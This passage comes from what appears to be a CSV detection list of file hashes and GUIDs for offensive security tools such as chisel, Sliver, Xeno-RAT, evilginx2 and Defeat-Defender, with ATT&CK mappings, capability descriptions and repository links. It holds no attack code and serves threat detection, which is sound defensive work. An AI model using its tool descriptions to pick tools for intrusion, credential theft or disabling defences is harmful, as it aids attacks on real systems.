tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a63a403167d39341c7a116a1f8d599d19859743cbb254ba6203733213081913f*",".{0,1000}a63a403167d39341c7a116a1f8d599d19859743cbb254ba6203733213081913f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a63e1dbd23bbc640410dd811ab84e179b741080c4b4d8b5e08e5622d79884e38*",".{0,1000}a63e1dbd23bbc640410dd811ab84e179b741080c4b4d8b5e08e5622d79884e38.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a644596787f407d005d3de5a3e02316c788b40dec8c5fdd0b4c010edc771677f*",".{0,1000}a644596787f407d005d3de5a3e02316c788b40dec8c5fdd0b4c010edc771677f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a6479f37d1ab80d878c949e10b1b44cd7714c87a67da40c438237af0501de51f*",".{0,1000}a6479f37d1ab80d878c949e10b1b44cd7714c87a67da40c438237af0501de51f.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*A64EF001-BE90-4CF5-86B2-22DFDB49AE81*",".{0,1000}A64EF001\-BE90\-4CF5\-86B2\-22DFDB49AE81.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*a650ad2f9d7d9ee450f8fd0926b0ec9512d02f2fbd96f4338549f5064519f9e6*",".{0,1000}a650ad2f9d7d9ee450f8fd0926b0ec9512d02f2fbd96f4338549f5064519f9e6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*a6730ebb3e91961283f7a1cd95ace2a6d0d55e50531a64e57b03e61a8cf2d0e7*",".{0,1000}a6730ebb3e91961283f7a1cd95ace2a6d0d55e50531a64e57b03e61a8cf2d0e7.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*a6f37544d43d1d50d3a860e72e723079bb1fc7f7e956089cade9b41d1a585c2f*",".{0,1000}a6f37544d43d1d50d3a860e72e723079bb1fc7f7e956089cade9b41d1a585c2f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*A7397316-0AEF-4379-B285-C276DE02BDE1*",".{0,1000}A7397316\-0AEF\-4379\-B285\-C276DE02BDE1.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*a7469955bff5e489d2270d9b389064e1*",".{0,1000}a7469955bff5e489d2270d9b389064e1.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*a74bc97d32a17a7c5a401229100635b8aee9907da5b6e6c6641ae6af9a81b7f2*",".{0,1000}a74bc97d32a17a7c5a401229100635b8aee9907da5b6e6c6641ae6af9a81b7f2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a756ddc08156eddb07bdddea3cc3c75748f854e4c0388e90b17017fc55bc02b6*",".{0,1000}a756ddc08156eddb07bdddea3cc3c75748f854e4c0388e90b17017fc55bc02b6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a75a1abcf2235c58fdcd4a6dd7c7347eeec4a094696c255bc8d45026d2c94e6c*",".{0,1000}a75a1abcf2235c58fdcd4a6dd7c7347eeec4a094696c255bc8d45026d2c94e6c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*a77a13a5a04bd0753a883fbefab58bc0504cd151303e285bb3799d6c38196a30*",".{0,1000}a77a13a5a04bd0753a883fbefab58bc0504cd151303e285bb3799d6c38196a30.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*a785efdc2a95072fe9caece4fd872ae1f543777b60cce590a847180c3926a9b2*",".{0,1000}a785efdc2a95072fe9caece4fd872ae1f543777b60cce590a847180c3926a9b2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a78983b009b688a82458abac952516db57dc7eb3118a35cc737dde29c7b87ec4*",".{0,1000}a78983b009b688a82458abac952516db57dc7eb3118a35cc737dde29c7b87ec4.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*a78d737f30e03d166d4e3e3b2dca71d54f1cbf582206dfe16a1e717ce3dc0ef7*",".{0,1000}a78d737f30e03d166d4e3e3b2dca71d54f1cbf582206dfe16a1e717ce3dc0ef7.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*a7a5c912263b0207145bd9c2397a4fa338ec82217df2ab83471bb884e473cc9e*",".{0,1000}a7a5c912263b0207145bd9c2397a4fa338ec82217df2ab83471bb884e473cc9e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*a7ab668cab3a63df4a03cc53c46eed13fbb13bf1*",".{0,1000}a7ab668cab3a63df4a03cc53c46eed13fbb13bf1.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*A7AD39B5-9BA1-48A9-B928-CA25FDD8F31F*",".{0,1000}A7AD39B5\-9BA1\-48A9\-B928\-CA25FDD8F31F.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*a7b5310c9d38f7242e05c42276f3f8cfd3724ce9ba8fe7ee13bbf22e5b1f9092*",".{0,1000}a7b5310c9d38f7242e05c42276f3f8cfd3724ce9ba8fe7ee13bbf22e5b1f9092.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a7fbaa609d657e8148a05586684aa41941b28bb5130b8db24b091cf0d9e2ae79*",".{0,1000}a7fbaa609d657e8148a05586684aa41941b28bb5130b8db24b091cf0d9e2ae79.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a8421a872b4c4eccc02a0ebb623f9ecc2991e949e4134fc184ca1822da0e5c4c*",".{0,1000}a8421a872b4c4eccc02a0ebb623f9ecc2991e949e4134fc184ca1822da0e5c4c.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*a8459e2fc93dc20b5277e4f671f612b96b2b79ba16fd31b8e98e847cd7f3e7ee*",".{0,1000}a8459e2fc93dc20b5277e4f671f612b96b2b79ba16fd31b8e98e847cd7f3e7ee.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a84e1abea8327bcede6dfb79b50b36780f2e1cdb8166002d75c070574a83738f*",".{0,1000}a84e1abea8327bcede6dfb79b50b36780f2e1cdb8166002d75c070574a83738f.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*a856cacd5a888686b543aaff5e4ca96d47872e3f59ef4b68701a035d5d35486c*",".{0,1000}a856cacd5a888686b543aaff5e4ca96d47872e3f59ef4b68701a035d5d35486c.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*a87fea89545bb209dcc98edfe23e5171def343793d956308ef1c9b5c1e477990*",".{0,1000}a87fea89545bb209dcc98edfe23e5171def343793d956308ef1c9b5c1e477990.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*a88f29ebf454ddc490c273365b81093089bb4c9f407546371522c2feaeb446db*",".{0,1000}a88f29ebf454ddc490c273365b81093089bb4c9f407546371522c2feaeb446db.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a8944d1ff8c72e68ca1bb55dad84aae6cb7d4cbcc92d442dc8497c8949a96adc*",".{0,1000}a8944d1ff8c72e68ca1bb55dad84aae6cb7d4cbcc92d442dc8497c8949a96adc.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*a8ce36f599c838c95b169252fe56cd412923d8d25f1cf906213d39582299ade7*",".{0,1000}a8ce36f599c838c95b169252fe56cd412923d8d25f1cf906213d39582299ade7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a8e669125c435f519ccde055c75dd9c44359ab15525846eeab7292262562b80c*",".{0,1000}a8e669125c435f519ccde055c75dd9c44359ab15525846eeab7292262562b80c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a8eb0e74d8b13b7467faafe2bda9b62634c237322ce951c3655578f3331a44e0*",".{0,1000}a8eb0e74d8b13b7467faafe2bda9b62634c237322ce951c3655578f3331a44e0.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*a8f27cc54021b10a9a24bde9dd4b569c2394aa7ad1ca70410959e8abf059eceb*",".{0,1000}a8f27cc54021b10a9a24bde9dd4b569c2394aa7ad1ca70410959e8abf059eceb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*A8FE1F5C-6B2A-4417-907F-4F6EDE9C15A3*",".{0,1000}A8FE1F5C\-6B2A\-4417\-907F\-4F6EDE9C15A3.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*a91b2af5590034ad95974a084b37d629d53800e8a4317a54080588cd8504c98a*",".{0,1000}a91b2af5590034ad95974a084b37d629d53800e8a4317a54080588cd8504c98a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a9307f3ece06735d45dbf3af3f84c5787f7afa194927dd3322a744b8f65ee058*",".{0,1000}a9307f3ece06735d45dbf3af3f84c5787f7afa194927dd3322a744b8f65ee058.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*a93513b46fd03b0bec44784379a68f6564a84691392da67baefe36dddd85f3f9*",".{0,1000}a93513b46fd03b0bec44784379a68f6564a84691392da67baefe36dddd85f3f9.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*a93f02549ee6f5a59d0472755b8719284f64e0ac451906a42d8eb9f5738add67*",".{0,1000}a93f02549ee6f5a59d0472755b8719284f64e0ac451906a42d8eb9f5738add67.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*a96b774c3d3e7a7727bd9929fb18fbee592377fa1bcd9a732bb8825bb0456357*",".{0,1000}a96b774c3d3e7a7727bd9929fb18fbee592377fa1bcd9a732bb8825bb0456357.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a98134e477c7bed393de4421eba7773ccce4cbe9bba6ab00fe260338691c352f*",".{0,1000}a98134e477c7bed393de4421eba7773ccce4cbe9bba6ab00fe260338691c352f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*a98d565ced4a422049d3ff0ad22e9641af814a09187d5793b40899865733df99*",".{0,1000}a98d565ced4a422049d3ff0ad22e9641af814a09187d5793b40899865733df99.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*a998e3aa58debd0797b430649420e49ca0b1299a005900dfaf17f661facfe039*",".{0,1000}a998e3aa58debd0797b430649420e49ca0b1299a005900dfaf17f661facfe039.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*a99b152752f479050ee12bde36fe6c85d3b07b0ee2b6e974abf287bfa2727916*",".{0,1000}a99b152752f479050ee12bde36fe6c85d3b07b0ee2b6e974abf287bfa2727916.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a9a8593db4e3f0d2b00c3683e029af751e6897bcb525fa0dc38777fe3bfb5c40*",".{0,1000}a9a8593db4e3f0d2b00c3683e029af751e6897bcb525fa0dc38777fe3bfb5c40.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a9ada318adc60090587f06cac5d110f274f1fc75e7705c09fc27b8921aa32651*",".{0,1000}a9ada318adc60090587f06cac5d110f274f1fc75e7705c09fc27b8921aa32651.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*A9EAA820-EC72-4052-80D0-A2CCBFCC83E6*",".{0,1000}A9EAA820\-EC72\-4052\-80D0\-A2CCBFCC83E6.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - 